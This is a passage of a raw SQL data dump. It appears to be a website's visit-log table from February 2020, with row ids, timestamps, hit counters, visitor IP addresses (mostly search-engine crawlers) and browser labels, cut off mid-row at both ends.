66.249.70.62','chrome'),(480872,1581623212,6,6,0,0,'66.249.64.27','chrome'),(480873,1581623320,1,1,0,0,'207.46.13.231','other'),(480874,1581623684,1,1,0,0,'213.180.203.109','other'),(480875,1581624195,5,4,1,0,'66.249.64.26',''),(480876,1581624314,4,4,0,0,'66.249.64.28','chrome'),(480877,1581624328,1,1,0,0,'213.180.203.19','other'),(480878,1581624527,1,1,0,0,'66.249.70.62','chrome'),(480879,1581624618,2,2,0,0,'66.249.64.27','chrome'),(480880,1581624898,2,2,0,0,'66.249.64.26','chrome'),(480881,1581624939,1,1,0,0,'207.46.13.130','other'),(480882,1581624956,1,1,0,0,'213.180.203.120','other'),(480883,1581625332,1,1,0,0,'66.249.64.28','chrome'),(480884,1581626065,3,3,0,0,'66.249.64.26','chrome'),(480885,1581626077,1,1,0,0,'66.249.70.62','chrome'),(480886,1581626125,2,2,0,0,'66.249.64.27','chrome'),(480887,1581626234,1,1,0,0,'207.46.13.231','other'),(480888,1581626253,2,2,0,0,'66.249.70.33','chrome'),(480889,1581626270,1,1,0,0,'66.249.64.28','chrome'),(480890,1581626471,1,1,0,0,'213.180.203.116','other'),(480891,1581626476,1,1,0,0,'213.180.203.81','other'),(480892,1581627022,1,1,0,0,'213.180.203.163','other'),(480893,1581627027,1,1,0,0,'66.249.70.62','chrome'),(480894,1581627161,1,1,0,0,'213.180.203.23','other'),(480895,1581627340,2,2,0,0,'207.46.13.231','other'),(480896,1581627442,1,1,0,0,'66.249.64.28','chrome'),(480897,1581627482,1,0,1,0,'66.249.64.27',''),(480898,1581627496,6,6,0,0,'66.249.64.27','chrome'),(480899,1581627597,3,3,0,0,'66.249.64.26','chrome'),(480900,1581628152,3,3,0,0,'66.249.70.33','chrome'),(480901,1581628642,1,1,0,0,'66.249.70.62','chrome'),(480902,1581628750,1,1,0,0,'213.180.203.20','other'),(480903,1581628758,2,2,0,0,'66.249.64.28','chrome'),(480904,1581628939,1,1,0,0,'82.145.211.107','other'),(480905,1581629153,1,1,0,0,'66.249.64.27','chrome'),(480906,1581629616,1,1,0,0,'8.29.198.27','other'),(480907,1581630049,1,1,0,0,'213.180.203.191','other'),(480908,1581630109,1,1,0,0,'66.249.70.36','chrome'),(480909,1581630518,1,1,0,0,'66.249.64.26','chrome'),(480910,1581630598,1,1,0,0,'213.180.203.124','other'),(480911,1581630629,1,1,0,0,'66.249.70.62','chrome'),(480912,1581630671,3,3,0,0,'66.249.64.27','chrome'),(480913,1581630733,1,1,0,0,'66.249.70.33','chrome'),(480914,1581630837,3,3,0,0,'66.249.64.28','chrome'),(480915,1581630974,1,1,0,0,'209.17.96.98','other'),(480916,1581631512,5,5,0,0,'66.249.64.26','chrome'),(480917,1581631535,1,1,0,0,'207.46.13.231','other'),(480918,1581632393,1,1,0,0,'213.180.203.124','other'),(480919,1581632509,1,1,0,0,'8.29.198.27','other'),(480920,1581632605,2,2,0,0,'66.249.70.33','chrome'),(480921,1581633182,1,1,0,0,'213.180.203.142','other'),(480922,1581633275,3,3,0,0,'66.249.64.28','chrome'),(480923,1581633386,2,2,0,0,'66.249.64.27','chrome'),(480924,1581633479,1,1,0,0,'66.249.64.26','chrome'),(480925,1581633588,1,1,0,0,'66.249.70.33','chrome'),(480926,1581633741,1,1,0,0,'18.237.38.73','chrome'),(480927,1581633744,1,1,0,0,'52.34.24.33','other'),(480928,1581634414,1,1,0,0,'213.180.203.124','other'),(480929,1581634442,1,0,1,0,'66.249.64.27',''),(480930,1581634652,1,1,0,0,'213.180.203.132','other'),(480931,1581634720,1,1,0,0,'66.249.70.36','chrome'),(480932,1581635255,1,1,0,0,'66.249.70.62','chrome'),(480933,1581635323,2,2,0,0,'66.249.64.28','chrome'),(480934,1581635517,1,1,0,0,'66.249.64.26','chrome'),(480935,1581635646,2,2,0,0,'66.249.70.33','chrome'),(480936,1581635995,1,1,0,0,'213.180.203.124','other'),(480937,1581636008,2,2,0,0,'66.249.64.27','chrome'),(480938,1581636373,1,1,0,0,'141.8.183.73','other'),(480939,1581636441,1,1,0,0,'66.249.64.26','chrome'),(480940,1581636511,1,1,0,0,'66.249.70.62','chrome'),(480941,1581636640,1,1,0,0,'66.249.64.28','chrome'),(480942,1581637354,1,1,0,0,'213.180.203.185','other'),(480943,1581637445,3,3,0,0,'66.249.64.26','chrome'),(480944,1581638077,2,2,0,0,'213.180.203.124','other'),(480945,1581638203,3,3,0,0,'66.249.64.27','chrome'),(480946,1581638425,1,1,0,0,'66.249.64.28','chrome'),(480947,1581638492,1,1,0,0,'66.249.64.26','chrome'),(480948,1581638518,1,1,0,0,'66.249.70.62','chrome'),(480949,1581638844,1,1,0,0,'178.154.171.127','other'),(480950,1581639075,1,1,0,0,'66.249.70.33','chrome'),(480951,1581639632,1,1,0,0,'66.249.64.27','chrome'),(480952,1581640134,1,1,0,0,'213.180.203.124','other'),(480953,1581641138,1,1,0,0,'8.29.198.25','other'),(480954,1581641428,3,3,0,0,'213.180.203.124','other'),(480955,1581641601,1,1,0,0,'66.249.64.26','chrome'),(480956,1581641713,1,1,0,0,'62.205.134.182','other'),(480957,1581642601,2,2,0,0,'66.249.64.27','chrome'),(480958,1581642745,1,1,0,0,'213.180.203.185','other'),(480959,1581644346,1,1,0,0,'213.180.203.124','other'),(480960,1581644353,1,1,0,0,'207.46.13.130','other'),(480961,1581644535,1,1,0,0,'8.29.198.25','other'),(480962,1581645002,1,1,0,0,'66.249.70.36','chrome'),(480963,1581645046,1,1,0,0,'66.249.70.33','chrome'),(480964,1581646266,1,0,1,0,'66.249.64.27',''),(480965,1581646682,2,2,0,0,'213.180.203.124','other'),(480966,1581646925,1,1,0,0,'66.249.64.27','chrome'),(480967,1581647139,1,1,0,0,'207.46.13.231','other'),(480968,1581647144,1,1,0,0,'66.249.70.62','chrome'),(480969,1581647178,1,1,0,0,'141.8.142.161','other'),(480970,1581647728,2,1,1,0,'66.249.64.26',''),(480971,1581648029,1,0,1,0,'66.249.64.28',''),(480972,1581648367,1,1,0,0,'213.180.203.124','other'),(480973,1581648655,1,1,0,0,'213.180.203.185','other'),(480974,1581648835,2,2,0,0,'207.46.13.130','other'),(480975,1581649193,1,1,0,0,'66.249.64.28','chrome'),(480976,1581649790,1,1,0,0,'213.180.203.124','other'),(480977,1581650199,2,2,0,0,'213.180.203.185','other'),(480978,1581650426,1,1,0,0,'178.154.171.127','other'),(480979,1581651177,1,1,0,0,'66.249.64.26','chrome'),(480980,1581651191,1,1,0,0,'66.249.70.36','chrome'),(480981,1581651789,1,1,0,0,'66.249.64.28','chrome'),(480982,1581652181,1,1,0,0,'213.180.203.73','other'),(480983,1581652630,1,1,0,0,'8.29.198.26','other'),(480984,1581653480,1,1,0,0,'66.249.64.26','chrome'),(480985,1581653540,1,1,0,0,'66.249.64.27','chrome'),(480986,1581653684,1,1,0,0,'66.249.64.28','chrome'),(480987,1581654427,1,1,0,0,'207.46.13.130','other'),(480988,1581654518,1,1,0,0,'213.180.203.124','other'),(480989,1581654619,1,0,1,0,'66.249.64.27',''),(480990,1581655900,2,2,0,0,'66.249.64.27','chrome'),(480991,1581656007,1,0,1,0,'66.249.64.28',''),(480992,1581656389,1,1,0,0,'8.29.198.25','other'),(480993,1581657271,1,1,0,0,'66.249.70.33','chrome'),(480994,1581657322,1,1,0,0,'207.46.13.202','other'),(480995,1581657700,1,0,1,0,'207.46.13.130',''),(480996,1581657705,1,1,0,0,'66.249.64.28','chrome'),(480997,1581657851,1,1,0,0,'178.154.171.127','other'),(480998,1581657934,1,0,1,0,'66.249.64.26',''),(480999,1581657970,1,1,0,0,'213.180.203.163','other'),(481000,1581658421,2,2,0,0,'66.249.64.27','chrome'),(481001,1581658564,1,1,0,0,'207.46.13.202','other'),(481002,1581658804,2,2,0,0,'66.249.64.26','chrome'),(481003,1581658865,2,2,0,0,'66.249.64.28','chrome'),(481004,1581658944,1,1,0,0,'66.249.70.36','chrome'),(481005,1581658968,1,1,0,0,'62.205.134.182','other'),(481006,1581659236,1,1,0,0,'213.180.203.109','other'),(481007,1581659260,1,1,0,0,'213.180.203.200','other'),(481008,1581659656,1,1,0,0,'213.180.203.23','other'),(481009,1581659787,1,1,0,0,'207.46.13.202','other'),(481010,1581660111,1,1,0,0,'66.249.64.26','chrome'),(481011,1581661251,2,2,0,0,'66.249.64.28','chrome'),(481012,1581661408,2,2,0,0,'66.249.64.27','chrome'),(481013,1581661636,1,1,0,0,'207.46.13.231','other'),(481014,1581661738,1,1,0,0,'213.180.203.167','other'),(481015,1581661823,2,2,0,0,'66.249.64.26','chrome'),(481016,1581661832,1,1,0,0,'91.196.177.46','chrome'),(481017,1581661999,1,1,0,0,'66.249.70.36','chrome'),(481018,1581662386,1,1,0,0,'207.46.13.202','other'),(481019,1581662391,1,1,0,0,'213.180.203.82','other'),(481020,1581662416,1,1,0,0,'5.45.207.49','other'),(481021,1581662548,1,1,0,0,'213.180.203.185','other'),(481022,1581663524,1,1,0,0,'66.249.64.30','chrome'),(481023,1581663761,1,1,0,0,'66.249.64.27','chrome'),(481024,1581663892,1,1,0,0,'213.180.203.167','other'),(481025,1581664100,1,1,0,0,'8.29.198.26','other'),(481026,1581664630,1,1,0,0,'31.13.127.3','other'),(481027,1581664631,1,1,0,0,'31.13.127.7','other'),(481029,1581664798,1,1,0,0,'134.209.245.211','msie'),(481030,1581664862,1,0,1,0,'66.249.64.28',''),(481031,1581664874,1,1,0,0,'213.180.203.82','other'),(481032,1581665107,1,1,0,0,'91.200.203.30','chrome'),(481033,1581665198,1,1,0,0,'207.46.13.231','other'),(481034,1581665253,1,1,0,0,'91.196.177.46','chrome'),(481035,1581665613,2,2,0,0,'66.249.64.27','chrome'),(481036,1581665713,1,1,0,0,'66.249.64.26','chrome'),(481037,1581665937,1,1,0,0,'213.180.203.82','other'),(481038,1581666106,1,1,0,0,'213.180.203.165','other'),(481039,1581666129,1,1,0,0,'107.21.1.8','other'),(481040,1581666131,1,1,0,0,'54.208.102.37','other'),(481041,1581666417,1,1,0,0,'5.196.92.91','firefox'),(481042,1581666571,1,1,0,0,'207.46.13.202','other'),(481043,1581666691,1,0,1,0,'66.249.64.27',''),(481044,1581666730,2,2,0,0,'66.249.64.26','chrome'),(481045,1581667263,1,1,0,0,'213.180.203.109','other'),(481046,1581668019,3,3,0,0,'66.249.64.27','chrome'),(481047,1581668207,1,1,0,0,'8.29.198.26','other'),(481048,1581668959,2,2,0,0,'207.46.13.202','other'),(481049,1581668965,1,1,0,0,'207.46.13.130','other'),(481050,1581668971,1,1,0,0,'207.46.13.231','other'),(481051,1581669284,1,1,0,0,'66.249.64.28','chrome'),(481052,1581669374,1,1,0,0,'66.249.64.27','chrome'),(481053,1581669377,2,2,0,0,'66.249.64.26','chrome'),(481054,1581669761,1,1,0,0,'213.180.203.19','other'),(481055,1581669806,1,1,0,0,'213.180.203.82','other'),(481056,1581669908,1,1,0,0,'91.124.118.222','chrome'),(481057,1581670906,1,1,0,0,'66.249.64.26','chrome'),(481058,1581671203,1,1,0,0,'66.249.64.28','chrome'),(481059,1581671348,2,2,0,0,'91.196.178.76','chrome'),(481060,1581671972,1,1,0,0,'213.180.203.82','other'),(481061,1581671995,1,1,0,0,'178.154.171.134','other'),(481062,1581672160,1,1,0,0,'207.46.13.130','other'),(481063,1581672375,2,2,0,0,'66.249.64.26','chrome'),(481064,1581672430,1,1,0,0,'91.196.178.151','chrome'),(481065,1581672439,2,2,0,0,'66.249.70.36','chrome'),(481066,1581672446,1,1,0,0,'66.249.64.28','chrome'),(481067,1581672457,1,1,0,0,'66.249.70.62','chrome'),(481068,1581672625,2,2,0,0,'66.249.64.27','chrome'),(481069,1581672710,1,1,0,0,'213.180.203.185','other'),(481070,1581672789,1,1,0,0,'213.180.203.189','other'),(481071,1581672914,1,1,0,0,'37.9.113.10','other'),(481072,1581673011,1,1,0,0,'213.180.203.20','other'),(481073,1581673043,1,1,0,0,'91.196.178.76','chrome'),(481074,1581673095,1,1,0,0,'207.46.13.130','other'),(481075,1581673517,2,1,1,0,'66.249.64.26',''),(481076,1581673791,1,1,0,0,'207.46.13.202','other'),(481077,1581674025,1,1,0,0,'18.218.45.101','chrome'),(481078,1581674122,1,1,0,0,'66.249.64.26','chrome'),(481079,1581674280,1,1,0,0,'91.196.178.93','chrome'),(481080,1581674281,1,1,0,0,'213.180.203.103','other'),(481081,1581674452,1,1,0,0,'213.180.203.125','other'),(481082,1581674515,1,1,0,0,'193.19.152.78','chrome'),(481083,1581674554,1,1,0,0,'149.154.161.10','other'),(481084,1581674557,1,1,0,0,'66.249.70.33','chrome'),(481085,1581674566,2,2,0,0,'66.249.64.28','chrome'),(481086,1581674987,2,2,0,0,'207.46.13.202','other'),(481087,1581675150,1,1,0,0,'66.249.64.27','chrome'),(481088,1581675213,1,1,0,0,'207.46.13.130','other'),(481089,1581675494,1,1,0,0,'66.249.64.28','chrome'),(481090,1581675569,1,1,0,0,'109.86.136.22','chrome'),(481091,1581675653,1,1,0,0,'8.29.198.25','other'),(481092,1581675687,1,1,0,0,'66.249.70.36','chrome'),(481093,1581675692,1,1,0,0,'213.180.203.20','other'),(481094,1581675702,2,2,0,0,'31.13.103.11','other'),(481095,1581676099,1,1,0,0,'66.249.64.27','chrome'),(481096,1581676103,1,1,0,0,'193.19.152.78','chrome'),(481097,1581676133,1,1,0,0,'91.196.178.142','chrome'),(481098,1581676307,1,1,0,0,'46.219.222.174','chrome'),(481099,1581676383,1,1,0,0,'91.196.178.151','chrome'),(481100,1581676394,2,2,0,0,'66.249.64.26','chrome'),(481101,1581676755,1,1,0,0,'66.249.69.34','chrome'),(481102,1581676816,1,1,0,0,'213.180.203.189','other'),(481103,1581676885,1,1,0,0,'91.196.178.76','chrome'),(481104,1581677360,1,1,0,0,'66.249.69.37','chrome'),(481105,1581677519,1,1,0,0,'213.180.203.102','other'),(481106,1581677569,1,1,0,0,'31.43.13.244','chrome'),(481107,1581677959,1,1,0,0,'213.180.203.200','other'),(481108,1581678093,1,1,0,0,'207.46.13.130','other'),(481109,1581678133,2,2,0,0,'66.249.69.62','chrome'),(481110,1581678373,1,1,0,0,'17.58.101.25','other'),(481111,1581678422,1,1,0,0,'213.180.203.165','other'),(481112,1581678485,2,2,0,0,'66.249.75.100','chrome'),(481113,1581678621,2,2,0,0,'66.249.69.34','chrome'),(481114,1581679230,1,1,0,0,'37.9.113.10','other'),(481115,1581679240,1,1,0,0,'178.154.171.134','other'),(481116,1581679659,1,1,0,0,'109.74.154.72','chrome'),(481117,1581680025,1,1,0,0,'8.29.198.26','other'),(481118,1581680295,1,1,0,0,'207.46.13.231','other'),(481119,1581680297,1,1,0,0,'213.180.203.191','other'),(481120,1581680472,1,1,0,0,'66.249.75.97','chrome'),(481121,1581680481,1,1,0,0,'31.13.127.4','other'),(481122,1581680482,1,1,0,0,'31.13.127.18','other'),(481124,1581680772,1,1,0,0,'213.180.203.103','other'),(481125,1581681687,2,2,0,0,'66.249.69.62','chrome'),(481126,1581681840,1,1,0,0,'66.249.69.34','chrome'),(481127,1581682116,1,1,0,0,'66.249.69.37','chrome'),(481128,1581682370,1,1,0,0,'193.19.152.78','chrome'),(481129,1581682391,1,1,0,0,'46.211.148.24','chrome'),(481130,1581682671,1,1,0,0,'207.46.13.202','other'),(481131,1581682689,1,1,0,0,'207.46.13.130','other'),(481132,1581683316,1,1,0,0,'66.249.69.37','chrome'),(481133,1581683382,1,1,0,0,'141.8.142.177','other'),(481134,1581683499,4,4,0,0,'66.249.69.34','chrome'),(481135,1581683514,1,1,0,0,'207.46.13.231','other'),(481136,1581683553,1,0,1,0,'66.249.69.62',''),(481137,1581684773,1,1,0,0,'213.180.203.132','other'),(481138,1581685152,2,2,0,0,'178.154.171.134','other'),(481139,1581685261,1,1,0,0,'66.249.69.37','chrome'),(481140,1581685332,1,1,0,0,'66.249.69.34','chrome'),(481141,1581685580,2,1,1,0,'207.46.13.202',''),(481142,1581686423,2,2,0,0,'207.46.13.231','other'),(481143,1581686865,2,2,0,0,'207.46.13.202','other'),(481144,1581687102,1,1,0,0,'66.249.69.34','chrome'),(481145,1581687145,1,1,0,0,'8.29.198.25','other'),(481146,1581688680,1,1,0,0,'91.196.178.74','firefox'),(481147,1581688949,1,1,0,0,'207.46.13.202','other'),(481148,1581689057,1,1,0,0,'178.92.251.46','chrome'),(481149,1581689941,1,0,1,0,'207.46.13.202',''),(481150,1581690056,1,1,0,0,'46.211.130.150','chrome'),(481151,1581690995,1,0,1,0,'66.249.75.126',''),(481152,1581691809,1,1,0,0,'8.29.198.27','other'),(481153,1581691975,1,1,0,0,'66.249.75.97','chrome'),(481154,1581692035,1,1,0,0,'66.249.69.62','chrome'),(481155,1581692074,1,1,0,0,'66.249.69.34','chrome'),(481156,1581692569,1,1,0,0,'66.249.69.37','chrome'),(481157,1581692686,2,2,0,0,'207.46.13.202','other'),(481158,1581692984,2,2,0,0,'66.249.75.97','chrome'),(481159,1581693898,1,1,0,0,'66.249.75.97','chrome'),(481160,1581693993,2,2,0,0,'66.249.69.37','chrome'),(481161,1581694198,1,1,0,0,'207.46.13.231','other'),(481162,1581695112,1,1,0,0,'66.249.69.62','chrome'),(481163,1581695654,2,1,1,0,'207.46.13.130',''),(481164,1581695759,1,1,0,0,'88.154.202.125','other'),(481165,1581695784,1,1,0,0,'66.249.69.34','chrome'),(481166,1581695944,2,2,0,0,'207.46.13.202','other'),(481167,1581696368,1,1,0,0,'141.8.183.73','chrome'),(481168,1581696528,2,2,0,0,'178.154.171.134','other'),(481169,1581696585,1,1,0,0,'207.46.13.231','other'),(481170,1581696821,2,2,0,0,'66.249.69.37','chrome'),(481171,1581696911,1,1,0,0,'66.249.75.126','chrome'),(481172,1581697176,2,2,0,0,'66.249.69.62','chrome'),(481173,1581697244,1,1,0,0,'178.154.171.127','chrome'),(481174,1581697304,1,1,0,0,'3.215.22.110','other'),(481175,1581697316,1,1,0,0,'66.249.69.34','chrome'),(481176,1581697720,2,2,0,0,'178.154.171.134','chrome'),(481177,1581698015,1,1,0,0,'178.128.182.213','firefox'),(481178,1581698268,2,2,0,0,'207.46.13.130','other'),(481179,1581698439,2,2,0,0,'141.8.142.2','chrome'),(481180,1581698646,1,1,0,0,'8.29.198.26','other'),(481181,1581698695,1,1,0,0,'141.8.183.111','chrome'),(481182,1581699058,4,4,0,0,'66.249.69.37','chrome'),(481183,1581699237,1,1,0,0,'207.46.13.202','other'),(481184,1581699638,1,1,0,0,'178.154.171.134','chrome'),(481185,1581699744,2,2,0,0,'66.249.69.62','chrome'),(481186,1581699872,1,1,0,0,'141.8.142.2','chrome'),(481187,1581699887,1,1,0,0,'207.46.13.130','other'),(481188,1581700424,1,0,1,0,'66.249.69.37',''),(481189,1581700427,1,1,0,0,'91.196.178.49','chrome'),(481190,1581701094,1,1,0,0,'207.46.13.202','other'),(481191,1581701128,2,2,0,0,'66.249.69.62','chrome'),(481192,1581701195,2,2,0,0,'178.154.171.127','chrome'),(481193,1581701199,3,3,0,0,'178.154.171.134','chrome'),(481194,1581701258,3,3,0,0,'66.249.69.34','chrome'),(481195,1581701284,2,2,0,0,'141.8.142.2','chrome'),(481196,1581701708,2,2,0,0,'66.249.69.37','chrome'),(481197,1581701736,1,1,0,0,'207.46.13.130','other'),(481198,1581701753,1,1,0,0,'66.249.75.100','chrome'),(481199,1581701861,1,1,0,0,'77.74.177.114','chrome'),(481200,1581702500,1,1,0,0,'178.154.171.134','chrome'),(481201,1581703062,1,1,0,0,'66.249.70.36','chrome'),(481202,1581703188,1,1,0,0,'178.154.171.127','chrome'),(481203,1581703600,1,1,0,0,'8.29.198.26','other'),(481204,1581704204,1,1,0,0,'178.154.171.134','chrome'),(481205,1581704371,3,3,0,0,'178.154.171.127','chrome'),(481206,1581704570,1,1,0,0,'141.8.142.161','chrome'),(481207,1581704827,1,1,0,0,'141.8.132.2','chrome'),(481208,1581704968,1,1,0,0,'193.57.46.25','chrome'),(481209,1581705085,1,1,0,0,'207.46.13.202','other'),(481210,1581705235,1,1,0,0,'66.249.64.26','chrome'),(481211,1581705268,1,1,0,0,'178.154.171.134','other'),(481212,1581705435,2,2,0,0,'66.249.64.28','chrome'),(481213,1581705863,1,1,0,0,'178.154.171.127','other'),(481214,1581705885,1,1,0,0,'66.249.70.33','chrome'),(481215,1581706148,4,4,0,0,'178.154.171.134','chrome'),(481216,1581706265,1,1,0,0,'95.108.213.55','chrome'),(481217,1581706857,1,1,0,0,'66.249.64.27','chrome'),(481218,1581706936,1,1,0,0,'178.154.171.134','other'),(481219,1581706939,2,2,0,0,'66.249.64.26','chrome'),(481220,1581707369,2,2,0,0,'66.249.64.28','chrome'),(481221,1581707422,4,4,0,0,'178.154.171.127','chrome'),(481222,1581708035,2,2,0,0,'66.249.64.27','chrome'),(481223,1581708092,1,1,0,0,'178.154.171.134','chrome'),(481224,1581708164,1,0,1,0,'207.46.13.202',''),(481225,1581708744,1,1,0,0,'178.154.171.127','chrome'),(481226,1581708746,1,1,0,0,'37.9.113.10','chrome'),(481227,1581708819,1,1,0,0,'91.196.178.164','chrome'),(481228,1581709187,1,1,0,0,'87.250.224.90','chrome'),(481229,1581709382,1,1,0,0,'66.249.70.62','chrome'),(481230,1581709402,3,3,0,0,'66.249.64.26','chrome'),(481231,1581709488,2,2,0,0,'66.249.64.27','chrome'),(481232,1581709512,2,2,0,0,'66.249.64.28','chrome'),(481233,1581709753,2,2,0,0,'178.154.171.134','chrome'),(481234,1581709942,2,2,0,0,'207.46.13.202','other'),(481235,1581710104,1,1,0,0,'8.29.198.25','other'),(481236,1581710202,1,1,0,0,'66.249.70.33','chrome'),(481237,1581710501,1,1,0,0,'178.154.171.127','chrome'),(481238,1581710862,1,1,0,0,'66.249.64.26','chrome'),(481239,1581711182,1,1,0,0,'207.46.13.202','other'),(481240,1581711687,1,1,0,0,'141.8.183.111','chrome'),(481241,1581711916,2,2,0,0,'178.154.171.127','chrome'),(481242,1581712377,1,1,0,0,'178.154.171.134','chrome'),(481243,1581713306,1,1,0,0,'66.249.64.26','chrome'),(481244,1581713459,1,1,0,0,'178.154.171.134','chrome'),(481245,1581713527,1,1,0,0,'141.8.142.2','chrome'),(481246,1581713639,1,1,0,0,'66.249.64.28','chrome'),(481247,1581713968,1,1,0,0,'207.46.13.202','other'),(481248,1581713984,1,1,0,0,'66.249.64.27','chrome'),(481249,1581714678,2,2,0,0,'66.249.64.28','chrome'),(481250,1581715388,3,3,0,0,'178.154.171.134','chrome'),(481251,1581715443,1,1,0,0,'8.29.198.25','other'),(481252,1581715712,2,2,0,0,'207.46.13.130','other'),(481253,1581715733,2,2,0,0,'66.249.64.26','chrome'),(481254,1581715928,3,3,0,0,'66.249.64.28','chrome'),(481255,1581716353,1,1,0,0,'66.249.64.27','chrome'),(481256,1581716800,1,1,0,0,'207.46.13.231','other'),(481257,1581717062,1,1,0,0,'178.154.171.134','chrome'),(481258,1581717132,1,1,0,0,'66.249.64.26','chrome'),(481259,1581717151,2,2,0,0,'178.154.171.127','chrome'),(481260,1581717266,1,1,0,0,'141.8.142.2','chrome'),(481261,1581717345,1,1,0,0,'34.236.171.128','other'),(481262,1581717682,1,1,0,0,'66.249.70.33','chrome'),(481263,1581717767,1,1,0,0,'66.249.64.27','chrome'),(481264,1581717941,1,1,0,0,'66.249.70.36','chrome'),(481265,1581718129,1,1,0,0,'37.9.113.10','chrome'),(481266,1581718583,1,1,0,0,'207.46.13.202','other'),(481267,1581718875,2,2,0,0,'66.249.70.33','chrome'),(481268,1581719292,1,1,0,0,'178.154.171.127','chrome'),(481269,1581719342,2,2,0,0,'66.249.64.28','chrome'),(481270,1581719515,1,1,0,0,'5.45.207.49','chrome'),(481271,1581719762,1,1,0,0,'141.8.183.111','chrome'),(481272,1581719837,1,1,0,0,'207.46.13.202','other'),(481273,1581720303,1,1,0,0,'207.46.13.231','other'),(481274,1581720355,2,2,0,0,'178.154.171.127','chrome'),(481275,1581720494,1,1,0,0,'141.8.188.12','chrome'),(481276,1581720525,2,2,0,0,'66.249.64.27','chrome'),(481277,1581720655,1,1,0,0,'66.249.64.28','chrome'),(481278,1581721166,1,1,0,0,'141.8.142.2','chrome'),(481279,1581721273,1,1,0,0,'207.46.13.231','other'),(481280,1581721294,1,1,0,0,'66.249.64.26','chrome'),(481281,1581721421,1,1,0,0,'8.29.198.26','other'),(481282,1581721692,1,1,0,0,'178.154.171.127','chrome'),(481283,1581722114,3,3,0,0,'178.154.171.134','chrome'),(481284,1581722716,1,1,0,0,'141.8.142.2','chrome'),(481285,1581723227,2,2,0,0,'178.154.171.127','chrome'),(481286,1581723328,1,1,0,0,'141.8.183.73','chrome'),(481287,1581723896,1,1,0,0,'37.9.113.10','chrome'),(481288,1581723907,1,1,0,0,'141.8.142.2','chrome'),(481289,1581724110,1,1,0,0,'178.154.171.127','other'),(481290,1581724289,1,1,0,0,'207.46.13.202','other'),(481291,1581724571,1,0,1,0,'66.249.64.26',''),(481292,1581724908,1,1,0,0,'178.154.171.127','chrome'),(481293,1581725441,1,1,0,0,'91.196.178.154','chrome'),(481294,1581725541,1,1,0,0,'31.13.115.3','other'),(481295,1581725542,1,1,0,0,'31.13.115.7','other'),(481296,1581725621,1,1,0,0,'141.8.183.73','chrome'),(481297,1581725707,2,2,0,0,'178.154.171.134','chrome'),(481298,1581725726,1,1,0,0,'141.8.142.2','chrome'),(481299,1581726563,2,2,0,0,'178.154.171.127','chrome'),(481300,1581726725,1,1,0,0,'8.29.198.26','other'),(481301,1581727585,2,2,0,0,'207.46.13.231','other'),(481302,1581728114,1,1,0,0,'62.205.134.182','other'),(481303,1581728384,1,1,0,0,'66.249.64.26','chrome'),(481304,1581728642,1,1,0,0,'178.154.171.127','chrome'),(481305,1581728884,2,2,0,0,'66.249.64.27','chrome'),(481306,1581729306,1,1,0,0,'141.8.142.177','chrome'),(481307,1581729858,1,1,0,0,'184.75.211.139','chrome'),(481308,1581730028,1,1,0,0,'66.249.70.33','chrome'),(481309,1581730291,2,2,0,0,'178.154.171.134','chrome'),(481310,1581731005,2,2,0,0,'178.154.171.127','chrome'),(481311,1581731194,1,1,0,0,'178.154.171.134','chrome'),(481312,1581731555,2,2,0,0,'207.46.13.202','other'),(481313,1581731660,1,1,0,0,'34.213.42.7','other'),(481314,1581732428,1,1,0,0,'8.29.198.27','other'),(481315,1581732526,2,2,0,0,'66.249.64.28','chrome'),(481316,1581732736,2,2,0,0,'66.249.64.26','chrome'),(481317,1581732957,1,1,0,0,'207.46.13.202','other'),(481318,1581733609,3,3,0,0,'178.154.171.134','chrome'),(481319,1581733825,1,1,0,0,'66.249.64.28','chrome'),(481320,1581733910,4,4,0,0,'66.249.64.27','chrome'),(481321,1581734181,1,1,0,0,'178.154.171.127','chrome'),(481322,1581735136,1,1,0,0,'37.9.113.10','chrome'),(481323,1581735339,4,4,0,0,'66.249.64.26','chrome'),(481324,1581735514,1,1,0,0,'207.46.13.231','other'),(481325,1581735530,1,1,0,0,'66.249.70.62','chrome'),(481326,1581735554,7,7,0,0,'66.249.64.27','chrome'),(481327,1581735784,1,1,0,0,'66.249.70.33','chrome'),(481328,1581735893,2,2,0,0,'178.154.171.134','chrome'),(481329,1581735902,1,1,0,0,'178.154.171.127','chrome'),(481330,1581736089,1,1,0,0,'178.154.171.134','other'),(481331,1581736591,1,1,0,0,'207.46.13.202','other'),(481332,1581737263,2,2,0,0,'66.249.64.28','chrome'),(481333,1581737438,1,1,0,0,'66.249.64.27','chrome'),(481334,1581737573,2,2,0,0,'207.46.13.202','other'),(481335,1581737801,1,1,0,0,'8.29.198.27','other'),(481336,1581738512,2,2,0,0,'66.249.64.26','chrome'),(481337,1581738847,1,1,0,0,'66.249.70.36','chrome'),(481338,1581739382,2,2,0,0,'66.249.64.27','chrome'),(481339,1581739447,1,1,0,0,'37.9.113.10','chrome'),(481340,1581739551,1,1,0,0,'66.249.64.28','chrome'),(481341,1581739582,1,1,0,0,'91.196.178.157','firefox'),(481342,1581739876,1,1,0,0,'66.249.64.26','chrome'),(481343,1581740066,2,2,0,0,'178.154.171.127','chrome'),(481344,1581740824,2,2,0,0,'178.154.171.134','chrome'),(481345,1581741269,1,1,0,0,'207.46.13.202','other'),(481346,1581741277,1,1,0,0,'66.249.64.27','chrome'),(481347,1581741652,1,1,0,0,'66.249.64.26','chrome'),(481348,1581742075,1,1,0,0,'178.154.171.134','other'),(481349,1581742138,2,2,0,0,'141.8.142.2','chrome'),(481350,1581742184,2,2,0,0,'178.154.171.127','chrome'),(481351,1581742376,1,1,0,0,'66.249.64.27','chrome'),(481352,1581742558,2,2,0,0,'178.154.171.134','chrome'),(481353,1581742661,1,1,0,0,'66.249.70.36','chrome'),(481354,1581743284,1,1,0,0,'66.249.64.27','chrome'),(481355,1581743286,2,2,0,0,'66.249.64.28','chrome'),(481356,1581743334,1,1,0,0,'66.249.70.33','chrome'),(481357,1581743409,1,1,0,0,'8.29.198.27','other'),(481358,1581743460,1,1,0,0,'207.46.13.202','other'),(481359,1581744130,1,1,0,0,'66.249.64.26','chrome'),(481360,1581744658,3,3,0,0,'178.154.171.127','chrome'),(481361,1581744852,2,2,0,0,'178.154.171.134','other'),(481362,1581745126,1,1,0,0,'141.8.142.2','chrome'),(481363,1581745136,1,1,0,0,'62.205.134.182','other'),(481364,1581746068,1,1,0,0,'66.249.64.28','chrome'),(481365,1581746764,1,1,0,0,'178.154.171.134','chrome'),(481366,1581746968,2,2,0,0,'66.249.64.26','chrome'),(481367,1581747102,1,1,0,0,'46.211.146.44','chrome'),(481368,1581747270,1,1,0,0,'91.209.11.236','other'),(481369,1581747332,1,1,0,0,'66.249.64.27','chrome'),(481370,1581747355,1,1,0,0,'178.154.171.127','chrome'),(481371,